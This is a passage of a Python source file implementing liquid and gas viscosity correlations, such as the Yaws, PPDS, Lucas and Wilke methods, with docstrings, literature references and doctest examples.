tau_20 = tau**0.05
tau2_20 = tau_20*tau_20
tau4_20 = tau2_20*tau2_20
tau8_20 = tau4_20*tau4_20
tau12_20 = tau4_20*tau8_20
tau24_20 = tau12_20*tau12_20
tau48_20 = tau24_20*tau24_20
x0 = exp(-delta)
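    # Residual (finite-density) contribution eta^r, with the five-term sum of the
    # docstring unrolled; the delta and tau powers assembled above avoid pow() calls.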
etar = (delta*(-8.876e-6*tau12_20*x0 + 0.002019e-6*tau48_20*delta8
+ 10.72e-6*tau4_20) + 1.122e-6*delta4*tau_20
- 0.02916e-6*delta8*tau24_20*x0*tau48_20)
# e_k = 103.3 # K
# Ts = T/e_k
Ts = T*0.00968054211035818 # 1/e_k
lnTs = log(Ts)
# tot = 0.0
# for i in range(5):
# tot += CIs[i]*lnTs**i
Omega = exp(lnTs*(lnTs*(lnTs*(0.005341 - 0.00331*lnTs) + 0.08406) - 0.4623) + 0.431)
# 0.0266958*sqrt(28.9586)/(0.360*0.360)*sqrt(132.6312) = 12.76...
eta0 = 12.765845058845755e-6/(Omega*tau8_20*tau2_20)
# eta0 = 0.0266958*sqrt(T*M)/(sigma*sigma*Omega)
# etar = 0.0
# for i in range(5):
# etar += Ni[i]*tau**ti[i]*delta**di[i]*exp(-gammai[i]*delta**Ii[i])
return (eta0 + etar)
def Viswanath_Natarajan_2(T, A, B):
r'''Calculate the viscosity of a liquid using the 2-term form
representation developed in [1]_. Requires input coefficients. The `A`
    coefficient is assumed to yield viscosity in Pa*s; if the tabulated
    coefficients yield values in units of 1E-2 Pa*s, subtract log(100) from `A`.
.. math::
\mu = \exp\left(A + \frac{B}{T}\right)
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients than [1]_ has been found.
Examples
--------
DDBST has 0.0004580 as a value at this temperature for 1-Butanol.
>>> Viswanath_Natarajan_2(348.15, -5.9719-log(100), 1007.0)
0.000459836869568295
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return exp(A + B/T)
def Viswanath_Natarajan_2_exponential(T, C, D):
r'''Calculate the viscosity of a liquid using the 2-term exponential form
    representation developed in [1]_. Requires input coefficients. The `C`
    coefficient is assumed to yield viscosity in Pa*s, as all
    coefficients found so far have done.
.. math::
\mu = C T^D
Parameters
----------
T : float
Temperature of fluid [K]
C : float
Linear coefficient, [Pa*s]
D : float
Exponential coefficient, [-]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
Examples
--------
>>> Ts = [283.15, 288.15, 303.15, 349.65]
>>> mus = [2.2173, 2.1530, 1.741, 1.0091] # in cP
>>> Viswanath_Natarajan_2_exponential(288.15, 4900800, -3.8075)
0.002114798866203873
    Calculation of the AARD of the fit (1% is the value stated in [1]_):
    >>> import numpy as np
    >>> mu_calc = [Viswanath_Natarajan_2_exponential(T, 4900800, -3.8075) for T in Ts]
>>> np.mean([abs((mu - mu_i*1000)/mu) for mu, mu_i in zip(mus, mu_calc)])
0.010467928813061298
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return C*T**D
def Viswanath_Natarajan_3(T, A, B, C):
r'''Calculate the viscosity of a liquid using the 3-term Antoine form
representation developed in [1]_. Requires input coefficients. If the
    coefficients do not yield viscosity in Pa*s, but rather cP, subtract
    log10(1000) from `A`.
    .. math::
        \log_{10} \mu = A + \frac{B}{C - T}
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [K]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
Examples
--------
>>> from math import log10
>>> Viswanath_Natarajan_3(298.15, -2.7173-log10(1000), -1071.18, -129.51)
0.0006129806445142113
References
----------
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
'''
return 10.0**(A + B/(C - T))
def mu_Yaws(T, A, B, C=0.0, D=0.0):
r'''Calculate the viscosity of a liquid using the 4-term Yaws polynomial
form. Requires input coefficients. If the
    coefficients do not yield viscosity in Pa*s, but rather cP, subtract
log10(1000) from `A`; this is required for the coefficients in [1]_.
.. math::
\log_{10} \mu = A + B/T + CT + DT^2
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
>>> from math import log10
>>> mu_Yaws(300.0, -6.4406-log10(1000), 1117.6, 0.0137, -0.000015465)
0.0010066612081
References
----------
.. [1] Yaws, Carl L. Thermophysical Properties of Chemicals and
Hydrocarbons, Second Edition. 2 edition. Amsterdam Boston: Gulf
Professional Publishing, 2014.
'''
exponent = (A + B/T + T*(C + D*T))
if exponent > 308.0:
return 1e308
return 10.0**exponent
def dmu_Yaws_dT(T, A, B, C=0.0, D=0.0):
r'''Calculate the temperature derivative of the viscosity of a liquid using
the 4-term Yaws polynomial form. Requires input coefficients.
.. math::
\frac{\partial \mu}{\partial T} = 10^{A + \frac{B}{T} + T \left(C
+ D T\right)} \left(- \frac{B}{T^{2}} + C + 2 D T\right)
\log{\left(10 \right)}
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
dmu_dT : float
First temperature derivative of liquid viscosity, [Pa*s/K]
Notes
-----
Examples
--------
>>> dmu_Yaws_dT(300.0, -9.4406, 1117.6, 0.0137, -0.000015465)
-1.853591586963e-05
'''
x0 = D*T
B_T = B/T
return 10.0**(A + B_T + T*(C + x0))*(-B_T/T + C + 2.0*x0)*2.302585092994046
def mu_Yaws_fitting_jacobian(Ts, A, B, C, D):
r'''Compute and return the Jacobian of the property predicted by
the Yaws viscosity equation with respect to all the coefficients. This is
used in fitting parameters for chemicals.
Parameters
----------
Ts : list[float]
Temperatures of the experimental data points, [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [1/K]
D : float
Coefficient, [1/K^2]
Returns
-------
    jac : list[list[float]]
        Matrix of derivatives of the equation with respect to the fitting
        parameters, with shape (len(Ts), 4), [various]
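    Examples
    --------
    A minimal usage sketch (coefficients reused from the :obj:`dmu_Yaws_dT`
    example; the values are illustrative only):
    >>> jac = mu_Yaws_fitting_jacobian([300.0, 350.0], -9.4406, 1117.6, 0.0137, -0.000015465)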
'''
N = len(Ts)
# out = np.zeros((N, 4)) # numba: uncomment
out = [[0.0]*4 for _ in range(N)] # numba: delete
for i in range(N):
T = Ts[i]
r = out[i]
x0 = 1.0/T
x1 = 10.0**(A + B*x0 + T*(C + D*T))*2.302585092994046
r[0] = x1
r[1] = x0*x1
r[2] = T*x1
r[3] = T*T*x1
return out
def PPDS9(T, A, B, C, D, E):
r'''Calculate the viscosity of a liquid using the 5-term exponential power
fit developed by the PPDS and named PPDS equation 9.
.. math::
\mu = E \exp\left[A \left(\frac{C-T}{T-D}\right)^{1/3}
+ B \left(\frac{C-T}{T-D}\right)^{4/3} \right]
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [-]
C : float
Coefficient, [K]
D : float
Coefficient, [K]
E : float
Coefficient, [Pa*s]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
No other source for these coefficients has been found.
    There can be a singularity in this equation when `T` approaches `C` or
    `D`; it may be helpful to limit `T` to no less than `D` + 5 K when
    evaluating this equation.
Examples
--------
>>> PPDS9(400.0, 1.74793, 1.33728, 482.347, 41.78, 9.963e-05)
0.00035091137378230684
References
----------
.. [1] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
       Berlin; New York: Springer, 2010.
'''
term = (C - T)/(T-D)
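    # When (C - T)/(T - D) is negative, take the real cube root of the magnitude
    # with a sign flip so the correlation remains usable, e.g. for temperatures above `C`.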
if term < 0.0:
term1 = -((T - C)/(T-D))**(1/3.)
else:
term1 = term**(1/3.)
term2 = term*term1
mu = E*trunc_exp(A*term1 + B*term2)
return mu
def dPPDS9_dT(T, A, B, C, D, E):
r'''Calculate the temperature derivative of viscosity of a liquid using
the 5-term exponential power fit developed by the PPDS and named PPDS
equation 9.
Normally, the temperature derivative is:
.. math::
\frac{\partial \mu}{\partial T} = E \left(\frac{A \sqrt[3]{\frac{C - T}
{- D + T}} \left(- D + T\right) \left(- \frac{C - T}{3 \left(- D
+ T\right)^{2}} - \frac{1}{3 \left(- D + T\right)}\right)}{C - T}
- \frac{B \sqrt[3]{\frac{C - T}{- D + T}} \left(C - T\right)}{\left(
- D + T\right)^{2}} + B \sqrt[3]{\frac{C - T}{- D + T}} \left(- \frac{
C - T}{3 \left(- D + T\right)^{2}} - \frac{1}{3 \left(- D + T\right)}
\right) - \frac{B \sqrt[3]{\frac{C - T}{- D + T}}}{- D + T}\right)
e^{A \sqrt[3]{\frac{C - T}{- D + T}} + \frac{B \sqrt[3]{\frac{C - T}
{- D + T}} \left(C - T\right)}{- D + T}}
For the low-temperature region:
.. math::
\frac{\partial \mu}{\partial T} = E \left(- \frac{A \sqrt[3]{\frac{
- C + T}{- D + T}} \left(- D + T\right) \left(- \frac{- C + T}{3
\left(- D + T\right)^{2}} + \frac{1}{3 \left(- D + T\right)}\right)
}{- C + T} + \frac{B \sqrt[3]{\frac{- C + T}{- D + T}} \left(C
- T\right)}{\left(- D + T\right)^{2}} + \frac{B \sqrt[3]{\frac{
- C + T}{- D + T}}}{- D + T} - \frac{B \sqrt[3]{\frac{- C + T}{
- D + T}} \left(C - T\right) \left(- \frac{- C + T}{3 \left(- D
+ T\right)^{2}} + \frac{1}{3 \left(- D + T\right)}\right)}{- C
+ T}\right) e^{- A \sqrt[3]{\frac{- C + T}{- D + T}} - \frac{B
\sqrt[3]{\frac{- C + T}{- D + T}} \left(C - T\right)}{- D + T}}
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [-]
C : float
Coefficient, [K]
D : float
Coefficient, [K]
E : float
Coefficient, [Pa*s]
Returns
-------
dmu_dT : float
        First temperature derivative of liquid viscosity, [Pa*s/K]
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
>>> dPPDS9_dT(400.0, 1.74793, 1.33728, 482.347, 41.78, 9.963e-05)
(-3.186540635882627e-06, 0.00035091137378230684)
References
----------
.. [1] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
       Berlin; New York: Springer, 2010.
'''
term = (C - T)/(T-D)
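    # The two branches below mirror the two analytical forms in the docstring;
    # the sign of (C - T)/(T - D) selects the form so the cube root stays real,
    # matching the branching in PPDS9.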
if term < 0.0:
x0 = 1.0/(-D + T)
x1 = x0*(-C + T)
x2 = -T
x3 = C + x2
x4 = B*x3
mu = E*trunc_exp(-x1**(1.0/3.0)*(A + x0*x4))
x6 = D + x2
x7 = 1.0/x6
x8 = x0*(x1 - 1.0)*(1.0/3.0)
dmu_dT = -mu*(x3*x7)**(1.0/3.0)*(-A*x6*x8/x3 + B*x7 + B*x8 - x4*x7*x7)
else:
x0 = -T
x1 = C + x0
x2 = D + x0
x3 = 1.0/x2
x4 = x1*x3
x5 = (-x4)**(1.0/3.0)
mu = E*trunc_exp(x5*(A - B*x4))
x7 = 1.0/(-D + T)
x8 = x7*(x1*x7 + 1.0)*(1.0/3.0)
dmu_dT = -x5*mu*(-A*x2*x8/x1 + B*x1*x3*x3 - B*x3 + B*x8)
return (dmu_dT, mu)
def mu_TDE(T, A, B, C, D):
r'''Calculate the viscosity of a liquid using the 4-term exponential
inverse-temperature fit equation used in NIST's TDE.
.. math::
\mu = \exp\left[A + \frac{B}{T} + \frac{C}{T^2} + \frac{D}{T^3}\right]
Parameters
----------
T : float
Temperature of fluid [K]
A : float
Coefficient, [-]
B : float
Coefficient, [K]
C : float
Coefficient, [K^2]
D : float
Coefficient, [K^3]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
Examples
--------
Coefficients for isooctane at 400 K, as shown in [1]_.
>>> mu_TDE(400.0, -14.0878, 3500.26, -678132.0, 6.17706e7)
0.0001822175281438
References
----------
.. [1] "ThermoData Engine (TDE103b V10.1) User`s Guide."
https://trc.nist.gov/TDE/Help/TDE103b/Eqns-Pure-ViscositySatL/ViscosityL.htm.
'''
T_inv = 1.0/T
expr = A + T_inv*(B + T_inv*(C + D*T_inv))
return trunc_exp(expr)
def PPDS5(T, Tc, a0, a1, a2):
r'''Calculate the viscosity of a low-pressure gas using the 3-term
exponential power fit developed by the PPDS and named PPDS equation 5.
.. math::
\mu = \frac{a_0 T_r}{\left( 1 + a_1 T_r^{a_2}(T_r - 1) \right)^{1/6}}
Parameters
----------
T : float
Temperature of fluid [K]
Tc : float
Critical temperature of fluid [K]
a0 : float
Coefficient, [-]
a1 : float
Coefficient, [-]
a2 : float
Coefficient, [-]
Returns
-------
mu : float
Low pressure gas viscosity, [Pa*s]
Notes
-----
Examples
--------
Sample coefficients for n-pentane in [1]_, at 350 K:
>>> PPDS5(T=350.0, Tc=470.008, a0=1.08003e-5, a1=0.19583, a2=0.811897)
8.096643275836e-06
References
----------
.. [1] "ThermoData Engine (TDE103b V10.1) User`s Guide."
https://trc.nist.gov/TDE/Help/TDE103b/Eqns-Pure-ViscosityG/PPDS5-ViscosityGas.htm.
'''
Tr = T/Tc
return a0*Tr/(1.0 + a1*(Tr - 1.0)*Tr**a2)**(1.0/6.0)
def Letsou_Stiel(T, MW, Tc, Pc, omega):
    r'''Calculates the viscosity of a liquid using an empirical model
    developed in [1]_. However, the fitting parameters for the tabulated values
    in the original article are found in ChemSep.
.. math::
\xi = \frac{2173.424 T_c^{1/6}}{\sqrt{MW} P_c^{2/3}}
.. math::
\xi^{(0)} = (1.5174 - 2.135T_r + 0.75T_r^2)\cdot 10^{-5}
.. math::
\xi^{(1)} = (4.2552 - 7.674 T_r + 3.4 T_r^2)\cdot 10^{-5}
.. math::
\mu = (\xi^{(0)} + \omega \xi^{(1)})/\xi
Parameters
----------
T : float
Temperature of fluid [K]
MW : float
        Molecular weight of fluid [g/mol]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
omega : float
Acentric factor of compound
Returns
-------
mu_l : float
Viscosity of liquid, [Pa*s]
Notes
-----
The form of this equation is a polynomial fit to tabulated data.
The fitting was performed by the DIPPR. This is DIPPR Procedure 8G: Method
    for the viscosity of pure, nonhydrocarbon liquids at high temperatures.
    Internal units are SI standard; [1]_'s units were different.
DIPPR test value for ethanol is used.
Average error 34%. Range of applicability is 0.76 < Tr < 0.98.
Examples
--------
>>> Letsou_Stiel(400., 46.07, 516.25, 6.383E6, 0.6371)
0.0002036150875308
References
----------
.. [1] Letsou, Athena, and Leonard I. Stiel. "Viscosity of Saturated
Nonpolar Liquids at Elevated Pressures." AIChE Journal 19, no. 2 (1973):
409-11. doi:10.1002/aic.690190241.
'''
Tr = T/Tc
xi0 = (1.5174 - Tr*(2.135 - 0.75*Tr))*1E-5
xi1 = (4.2552 - Tr*(7.674 - 3.4*Tr))*1E-5
xi = 2173.424*Tc**(1.0/6.)/sqrt(MW)*Pc**(-2.0/3.)
return (xi0 + omega*xi1)/xi
def Przedziecki_Sridhar(T, Tm, Tc, Pc, Vc, Vm, omega, MW):
    r'''Calculates the viscosity of a liquid using an empirical formula
developed in [1]_.
.. math::
\mu=\frac{V_o}{E(V-V_o)}
.. math::
E=-1.12+\frac{V_c}{12.94+0.10MW-0.23P_c+0.0424T_{m}-11.58(T_{m}/T_c)}
.. math::
V_o = 0.0085\omega T_c-2.02+\frac{V_{m}}{0.342(T_m/T_c)+0.894}
Parameters
----------
T : float
Temperature of the fluid [K]
Tm : float
Melting point of fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
Vc : float
Critical volume of the fluid [m^3/mol]
Vm : float
        Molar volume of the fluid at temperature `T`, [m^3/mol]
omega : float
Acentric factor of compound
MW : float
        Molecular weight of fluid [g/mol]
Returns
-------
mu_l : float
Viscosity of liquid, [Pa*s]
Notes
-----
    A test value from Reid (1983) is used, but it is only approximately reproduced.
This function is not recommended.
Internal units are bar and mL/mol.
Examples
--------
>>> Przedziecki_Sridhar(383., 178., 591.8, 41E5, 316E-6, 95E-6, .263, 92.14)
0.00021981479956033846
References
----------
.. [1] Przedziecki, J. W., and T. Sridhar. "Prediction of Liquid
Viscosities." AIChE Journal 31, no. 2 (February 1, 1985): 333-35.
doi:10.1002/aic.690310225.
'''
    Pc = Pc*1e-5 # Pa to bar
Vm, Vc = Vm*1E6, Vc*1E6 # m^3/mol to mL/mol
Tc_inv = 1.0/Tc
Tr = T*Tc_inv
Tr2 = Tr*Tr
Gamma = 0.29607 - 0.09045*Tr - 0.04842*Tr2
VrT = 0.33593 - 0.33953*Tr + 1.51941*Tr2 - 2.02512*Tr*Tr2 + 1.11422*Tr2*Tr2
V = VrT*(1.0 - omega*Gamma)*Vc
Vo = 0.0085*omega*Tc - 2.02 + Vm/(0.342*(Tm*Tc_inv) + 0.894) # checked
E = -1.12 + Vc/(12.94 + 0.1*MW - 0.23*Pc + 0.0424*Tm - 11.58*(Tm*Tc_inv))
return Vo/(E*(V-Vo))*1e-3
### Viscosity of Dense Liquids
def Lucas(T, P, Tc, Pc, omega, Psat, mu_l):
    r'''Adjusts the viscosity of a liquid for pressure using an empirical
    formula developed in [1]_, but as presented in [2]_, as the original source
    is in German.
.. math::
\frac{\mu}{\mu_{sat}}=\frac{1+D(\Delta P_r/2.118)^A}{1+C\omega \Delta P_r}
.. math::
\Delta P_r = \frac{P-P^{sat}}{P_c}
.. math::
A=0.9991-\frac{4.674\times 10^{-4}}{1.0523T_r^{-0.03877}-1.0513}
.. math::
D = \frac{0.3257}{(1.0039-T_r^{2.573})^{0.2906}}-0.2086
.. math::
C = -0.07921+2.1616T_r-13.4040T_r^2+44.1706T_r^3-84.8291T_r^4+
96.1209T_r^5-59.8127T_r^6+15.6719T_r^7
Parameters
----------
T : float
Temperature of fluid [K]
P : float
Pressure of fluid [Pa]
    Tc : float
        Critical temperature of fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
omega : float
Acentric factor of compound
Psat : float
Saturation pressure of the fluid [Pa]
mu_l : float
Viscosity of liquid at 1 atm or saturation, [Pa*s]
Returns
-------
mu_l_dense : float
Viscosity of liquid, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The example is from Reid (1987); all results agree.
Above several thousand bar, this equation does not represent true behavior.
If Psat is larger than P, the fluid may not be liquid; dPr is set to 0.
Examples
--------
>>> Lucas(300., 500E5, 572.2, 34.7E5, 0.236, 0, 0.00068) # methylcyclohexane
0.0010683738499316494
References
----------
.. [1] Lucas, Klaus. "Ein Einfaches Verfahren Zur Berechnung Der
Viskositat von Gasen Und Gasgemischen." Chemie Ingenieur Technik 46, no. 4
(February 1, 1974): 157-157. doi:10.1002/cite.330460413.
.. [2] Reid, Robert C.; Prausnitz, John M.; Poling, Bruce E.
Properties of Gases and Liquids. McGraw-Hill Companies, 1987.
'''
Tr = min(T/Tc, 1.0)
C = Tr*(Tr*(Tr*(Tr*(Tr*(Tr*(15.6719*Tr - 59.8127) + 96.1209) - 84.8291) + 44.1706) - 13.404) + 2.1616) - 0.07921
D = 0.3257*(1.0039-Tr**2.573)**-0.2906 - 0.2086
A = 0.9991 - 4.674E-4/(1.0523*Tr**-0.03877 - 1.0513)
dPr = (P-Psat)/Pc
if dPr < 0.0:
dPr = 0.0
return (1. + D*(dPr*(1.0/2.118))**A)/(1. + C*omega*dPr)*mu_l
### Viscosity of liquid mixtures
### Viscosity of Gases - low pressure
def Yoon_Thodos(T, Tc, Pc, MW):
    r'''Calculates the viscosity of a gas using an empirical formula
developed in [1]_.
.. math::
        \eta \xi \times 10^8 = 46.10 T_r^{0.618} - 20.40 \exp(-0.449T_r)
        + 19.40\exp(-4.058T_r) + 1
.. math::
\xi = 2173.424 T_c^{1/6} MW^{-1/2} P_c^{-2/3}
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
        Molecular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
This equation has been tested. The equation uses SI units only internally.
The constant 2173.424 is an adjustment factor for units.
Average deviation within 3% for most compounds.
Greatest accuracy with dipole moments close to 0.
Hydrogen and helium have different coefficients, not implemented.
This is DIPPR Procedure 8B: Method for the Viscosity of Pure,
    nonhydrocarbon, nonpolar gases at low pressures.
Examples
--------
>>> Yoon_Thodos(300., 556.35, 4.5596E6, 153.8)
1.019488572777e-05
References
----------
.. [1] Yoon, Poong, and George Thodos. "Viscosity of Nonpolar Gaseous
Mixtures at Normal Pressures." AIChE Journal 16, no. 2 (1970): 300-304.
doi:10.1002/aic.690160225.
'''
Tr = T/Tc
xi = 2173.4241*Tc**(1/6.)/sqrt(MW)*Pc**(-2.0/3.)
a = 46.1
b = 0.618
c = 20.4
d = -0.449
e = 19.4
f = -4.058
return (1. + a*Tr**b - c * exp(d*Tr) + e*exp(f*Tr))/(1E8*xi)
def Stiel_Thodos(T, Tc, Pc, MW):
    r'''Calculates the viscosity of a gas using an empirical formula
developed in [1]_.
if :math:`T_r > 1.5`:
.. math::
\mu_g = 17.78\times 10^{-5} (4.58T_r - 1.67)^{0.625}/\xi
else:
.. math::
\mu_g = 34\times 10^{-5} T_r^{0.94}/\xi
.. math::
\xi = \frac{T_c^{(1/6)}}{\sqrt{MW} P_c^{2/3}}
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
        Molecular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
Claimed applicability from 0.2 to 5 atm.
    Developed with data from 52 nonpolar and 53 polar gases.
    Internal units are poise and atm.
Seems to give reasonable results.
Examples
--------
>>> Stiel_Thodos(300., 556.35, 4.5596E6, 153.8) #CCl4
1.040892622360e-05
References
----------
.. [1] Stiel, Leonard I., and George Thodos. "The Viscosity of Nonpolar
Gases at Normal Pressures." AIChE Journal 7, no. 4 (1961): 611-15.
doi:10.1002/aic.690070416.
'''
Pc = Pc*(1.0/101325.)
Tr = T/Tc
xi = Tc**(1/6.)/(sqrt(MW)*Pc**(2/3.))
if Tr > 1.5:
mu_g = 17.78E-5*(4.58*Tr-1.67)**0.625/xi
else:
mu_g = 34E-5*Tr**0.94/xi
return mu_g*1e-3
def Lucas_gas(T, Tc, Pc, Zc, MW, dipole=0.0, CASRN=None):
    r'''Estimate the viscosity of a gas using an empirical
    formula developed in several sources, but as presented in [1]_, as the
original sources are in German or merely personal communications with the
authors of [1]_.
.. math::
\eta = \left[0.807T_r^{0.618}-0.357\exp(-0.449T_r) + 0.340\exp(-4.058
T_r) + 0.018\right]F_p^\circ F_Q^\circ /\xi
.. math::
F_p^\circ=1, 0 \le \mu_{r} < 0.022
.. math::
F_p^\circ = 1+30.55(0.292-Z_c)^{1.72}, 0.022 \le \mu_{r} < 0.075
.. math::
        F_p^\circ = 1+30.55(0.292-Z_c)^{1.72}|0.96+0.1(T_r-0.7)|, \quad 0.075 \le \mu_{r}
.. math::
F_Q^\circ = 1.22Q^{0.15}\left\{ 1+0.00385[(T_r-12)^2]^{1/M}\text{sign}
(T_r-12)\right\}
.. math::
\mu_r = 52.46 \frac{\mu^2 P_c}{T_c^2}
.. math::
\xi=0.176\left(\frac{T_c}{MW^3 P_c^4}\right)^{1/6}
Parameters
----------
T : float
Temperature of fluid [K]
    Tc : float
        Critical temperature of fluid [K]
    Pc : float
        Critical pressure of the fluid [Pa]
    Zc : float
        Critical compressibility of the fluid, [-]
    dipole : float, optional
        Dipole moment of fluid [debye]
CASRN : str, optional
CAS of the fluid
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
The example is from [1]_; all results agree.
Viscosity is calculated in micropoise, and converted to SI internally (1E-7).
Q for He = 1.38; Q for H2 = 0.76; Q for D2 = 0.52.
Examples
--------
>>> Lucas_gas(T=550., Tc=512.6, Pc=80.9E5, Zc=0.224, MW=32.042, dipole=1.7)
1.7822676912698925e-05
References
----------
.. [1] Reid, Robert C.; Prausnitz, John M.; Poling, Bruce E.
Properties of Gases and Liquids. McGraw-Hill Companies, 1987.
'''
Tc_inv = 1.0/Tc
Tr = T*Tc_inv
MW_inv = 1.0/MW
Pc_bar = Pc*1e-5
    xi = 0.176*(Tc*MW_inv*MW_inv*MW_inv/(Pc_bar*Pc_bar*Pc_bar*Pc_bar))**(1.0/6.0) # bar according to example in Poling
if dipole is None:
dipole = 0.0
    dipoler = 52.46*dipole*dipole*Pc_bar*Tc_inv*Tc_inv # bar according to example in Poling
if dipoler < 0.022:
Fp = 1.0
elif 0.022 <= dipoler < 0.075:
Fp = 1.0 + 30.55*(0.292 - Zc)**1.72
else:
Fp = 1.0 + 30.55*(0.292 - Zc)**1.72*abs(0.96 + 0.1*(Tr - 0.7))
FQ = 1.0
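    # Quantum-gas correction factor F_Q; it differs from 1.0 only for helium,
    # hydrogen, and deuterium, identified by their CAS numbers below.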
if CASRN is not None:
Q = 0.0
if CASRN == '7440-59-7':
Q = 1.38
elif CASRN == '1333-74-0':
Q = 0.76
elif CASRN == '7782-39-0':
Q = 0.52
if Q != 0.0:
if Tr - 12.0 > 0.0:
value = 1.0
else:
value = -1.0
x0 = (Tr-12.0)
FQ = 1.22*Q**0.15*(1.0 + 0.00385*(x0*x0)**(MW_inv)*value)
eta = (0.807*Tr**0.618 - 0.357*exp(-0.449*Tr) + 0.340*exp(-4.058*Tr) + 0.018)*Fp*FQ/xi
return eta*1E-7
def viscosity_gas_Gharagheizi(T, Tc, Pc, MW):
    r'''Calculates the viscosity of a gas using an empirical formula
developed in [1]_.
.. math::
        \mu = 10^{-7} \left| 10^{-5} P_cT_r + \left(0.091-\frac{0.477}{M}\right)T +
        M \left(10^{-5}P_c-\frac{8M^2}{T^2}\right)
        \left(\frac{10.7639}{T_c}-\frac{4.1929}{T}\right)\right|
Parameters
----------
T : float
Temperature of the fluid [K]
Tc : float
Critical temperature of the fluid [K]
Pc : float
Critical pressure of the fluid [Pa]
MW : float
        Molecular weight of fluid [g/mol]
Returns
-------
mu_g : float
Viscosity of gas, [Pa*s]
Notes
-----
Example is first point in supporting information of article, for methane.
    This is the preferred function for gas viscosity.
7% average relative deviation. Deviation should never be above 30%.
Developed with the DIPPR database. It is believed theoretically predicted values
are included in the correlation.
    Below 0.2 Tc, this implementation clamps the temperature so the correlation
    returns its value at that limit.
Examples
--------
>>> viscosity_gas_Gharagheizi(120., 190.564, 45.99E5, 16.04246)
5.215761625399613e-06
References
----------
.. [1] Gharagheizi, Farhad, Ali Eslamimanesh, Mehdi Sattari, Amir H.
Mohammadi, and Dominique Richon. "Corresponding States Method for
Determination of the Viscosity of Gases at Atmospheric Pressure."
Industrial & Engineering Chemistry Research 51, no. 7
(February 22, 2012): 3179-85. doi:10.1021/ie202591f.
'''
Tr = T/Tc
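    # Clamp to Tr = 0.2 (as noted in the docstring) so the correlation stays
    # well behaved at very low temperatures.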
if Tr < 0.2:
Tr = 0.2
T = 0.2*Tc
mu_g = 1E-5*Pc*Tr + (0.091 - 0.477/MW)*T + MW*(1E-5*Pc - 8.0*MW*MW/(T*T))*(10.7639/Tc - 4.1929/T)
mu_g = 1e-7*mu_g
return mu_g
### Viscosity of gas mixtures
def Herning_Zipperer(zs, mus, MWs, MW_roots=None):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\mu = \frac{\sum x_i \mu_i \sqrt{MW_i}}
{\sum x_i \sqrt{MW_i}}
Parameters
----------
    zs : list[float]
        Mole fractions of components, [-]
    mus : list[float]
        Gas viscosities of all components, [Pa*s]
    MWs : list[float]
        Molecular weights of all components, [g/mol]
    MW_roots : list[float], optional
        Square roots of molecular weights of all components, [g^0.5/mol^0.5]
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed.
    Providing `MW_roots` avoids recomputing the square roots and can speed up the calculation.
Examples
--------
>>> Herning_Zipperer([0.5, 0.25, 0.25], [1.78e-05, 1.12e-05, 9.35e-06], [28.0134, 16.043, 30.07])
1.4174908599465168e-05
References
----------
.. [1] Herning, F. and Zipperer, L,: "Calculation of the Viscosity of
Technical Gas Mixtures from the Viscosity of Individual Gases, german",
Gas u. Wasserfach (1936) 79, No. 49, 69.
'''
N = len(zs)
if MW_roots is None:
MW_roots = [0.0]*N
for i in range(N):
MW_roots[i] = sqrt(MWs[i])
denominator = k = 0.0
for i in range(N):
v = zs[i]*MW_roots[i]
k += v*mus[i]
denominator += v
return k/denominator
def Wilke(ys, mus, MWs):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \frac{(1 + \sqrt{\eta_i/\eta_j}(MW_j/MW_i)^{0.25})^2}
{\sqrt{8(1+MW_i/MW_j)}}
Parameters
----------
    ys : list[float]
        Mole fractions of gas components, [-]
    mus : list[float]
        Gas viscosities of all components, [Pa*s]
    MWs : list[float]
